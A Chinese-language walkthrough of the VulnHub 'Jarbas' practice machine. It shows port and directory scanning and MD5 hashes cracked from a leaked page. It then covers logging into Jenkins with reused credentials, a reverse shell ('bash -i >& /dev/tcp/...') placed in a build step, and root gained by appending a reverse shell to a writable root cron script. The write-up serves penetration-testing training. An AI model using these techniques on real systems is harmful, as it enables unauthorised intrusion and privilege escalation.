靶场地址:https://www.vulnhub.com/entry/jarbas-1,232/
信息收集
主机发现
nmap -sn 192.168.18.142/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-15 13:32 CST
Nmap scan report for 192.168.18.1
Host is up (0.026s latency).
MAC Address: 30:AE:7B:E3:91:3F (Deqing Dusun Electron)
Nmap scan report for 192.168.18.123
Host is up (0.0020s latency).
MAC Address: 8C:AB:8E:7D:2C:F3 (Shanghai Feixun Communication)
Nmap scan report for LAPTOP-1DVA2N7.lan (192.168.18.197)
Host is up (0.00011s latency).
MAC Address: 40:74:E0:20:72:D1 (Intel Corporate)
Nmap scan report for jarbas.lan (192.168.18.218)
Host is up (0.00034s latency).
MAC Address: 00:0C:29:1F:20:4E (VMware)
Nmap scan report for kali.lan (192.168.18.142)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.28 seconds
端口扫描
┌──(root㉿kali)-[~] │
└─# nmap --min-rate 10000 192.168.18.218 │
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-15 13:37 CST │
Nmap scan report for jarbas.lan (192.168.18.218) │
Host is up (0.000074s latency). │
Not shown: 996 closed tcp ports (reset) │
PORT STATE SERVICE │
22/tcp open ssh │
80/tcp open http │
3306/tcp open mysql │
8080/tcp open http-proxy │
MAC Address: 00:0C:29:1F:20:4E (VMware) │
│
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
端口详细信息、操作系统
========TCP
└─# nmap -sT -sV -O -p22,80,3306,8080 192.168.18.218
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-15 13:38 CST
Nmap scan report for jarbas.lan (192.168.18.218)
Host is up (0.00040s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Jetty 9.4.z-SNAPSHOT
MAC Address: 00:0C:29:1F:20:4E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.18 seconds
=======UDP
└─# nmap -sU -p22,80,3306,8080 192.168.18.218
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-15 13:43 CST
Nmap scan report for jarbas.lan (192.168.18.218)
Host is up (0.00018s latency).
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
3306/udp closed mysql
8080/udp closed http-alt
MAC Address: 00:0C:29:1F:20:4E (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
脚本扫描
└─# nmap --script=vuln -p22,80,3306,8080 192.168.18.218
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-15 13:40 CST
Nmap scan report for jarbas.lan (192.168.18.218)
Host is up (0.00025s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-trace: TRACE is enabled
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
8080/tcp open http-proxy
| http-enum:
|_ /robots.txt: Robots file
MAC Address: 00:0C:29:1F:20:4E (VMware)
Nmap done: 1 IP address (1 host up) scanned in 31.81 seconds
80端口8080端口漏洞测试
访问80、8080端口浏览一下
进行目录扫描
dirb扫描
└─# dirb http://192.168.18.218
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Feb 15 13:50:33 2023
URL_BASE: http://192.168.18.218/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.18.218/ ----
+ http://192.168.18.218/cgi-bin/ (CODE:403|SIZE:210)
+ http://192.168.18.218/index.html (CODE:200|SIZE:32808)
-----------------
END_TIME: Wed Feb 15 13:50:39 2023
DOWNLOADED: 4612 - FOUND: 2
御剑扫
"1","http://192.168.18.218/index.html","200"
"2","http://192.168.18.218/access.html","200"
"3","http://192.168.18.218/\.html","403"
浏览扫描页面,发现有用页面http://192.168.18.218/access.html
记录了类似账号密码的页面
tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98
进行密码识别
hash-identifier 5978a63b4654c73c60fa24f836386d87
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
#########################################################################
--------------------------------------------------
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
为MD5
进行密码破解
5978a63b4654c73c60fa24f836386d87:italia99
9b38e2b1e8b12f426b0d208a7ab6cb98:vipsu
f463f63616cb3f1e81ce46b39f882fd5:marianna
tiago:italia99
trindade:vipsu
eder:marianna
进行8080端口登录尝试
这里要进行账号和密码的一个碰撞,尝试发现下面一个账号能成功
eder:vipsu
在构建项目的时候插入反弹shell
新建任务
新建任务,点击确定
在构建后操作,写上shell反弹命令
写上反弹shell点击保存
bash -i >& /dev/tcp/ip/port 0>&1
在攻击机上面保持nc监听后点击构建
nc -lvvp 4444
listening on [any] 4444 ...
查看有用信息
bash-4.2$ uname -a │2: eth0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc fq_codel state DOWN group default qlen
uname -a │1000
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x│ link/ether 00:0c:29:3e:ec:e7 brd ff:ff:ff:ff:ff:ff
86_64 GNU/Linux │3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
bash-4.2$ sudo -l │ link/ether 00:0c:29:3e:ec:fb brd ff:ff:ff:ff:ff:ff
sudo -l │ inet 192.168.18.142/24 brd 192.168.18.255 scope global dynamic noprefixroute eth1
│ valid_lft 37169sec preferred_lft 37169sec
We trust you have received the usual lecture from the local System │ inet6 fe80::20c:29ff:fe3e:ecfb/64 scope link noprefixroute
Administrator. It usually boils down to these three things: │ valid_lft forever preferred_lft forever
│4: br-df3300895475: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group def
#1) Respect the privacy of others. │ault
#2) Think before you type. │ link/ether 02:42:e8:f1:6e:2e brd ff:ff:ff:ff:ff:ff
#3) With great power comes great responsibility. │ inet 172.18.0.1/16 brd 172.18.255.255 scope global br-df3300895475
│ valid_lft forever preferred_lft forever
sudo: no tty present and no askpass program specified
发现权限很低,进行提权
提权
查看账号
bash-4.2$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false
bash-4.2$
发现eder账号,尝试ssh复用
┌──(root㉿kali)-[~]
└─# ssh eder@219.168.18.218
ssh: connect to host 219.168.18.218 port 22: Connection timed out
尝试使用定时任务提权
发现是有定时任务的
bash-4.2$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash
rm -rf /var/log/httpd/access_log.txt
在定时任务中追加反弹shell
在运行之前,先进行监听
└─# nc -lvvp 4442
listening on [any] 4442 ...
echo '/bin/bash -i >& /dev/tcp/192.168.18.142/4442 0>&1' >> /etc/script/CleaningScript.sh
等待五分钟左右即可
┌──(root㉿kali)-[~/Desktop/vulhub]
└─# nc -lvp 4442
listening on [any] 4442 ...
connect to [192.168.18.142] from jarbas.lan [192.168.18.218] 42608
bash: no job control in this shell
[root@jarbas ~]# sudo -l
sudo -l
Matching Defaults entries for root on jarbas:
!visiblepw, always_set_home, match_group_by_gid, env_reset,
env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User root may run the following commands on jarbas:
(ALL) ALL
[root@jarbas ~]#
至此渗透结束
总结
对crontab总结
一般低权限账号是没有定时任务写的权限的,但是可以根据已写的高权限文件添加反弹shell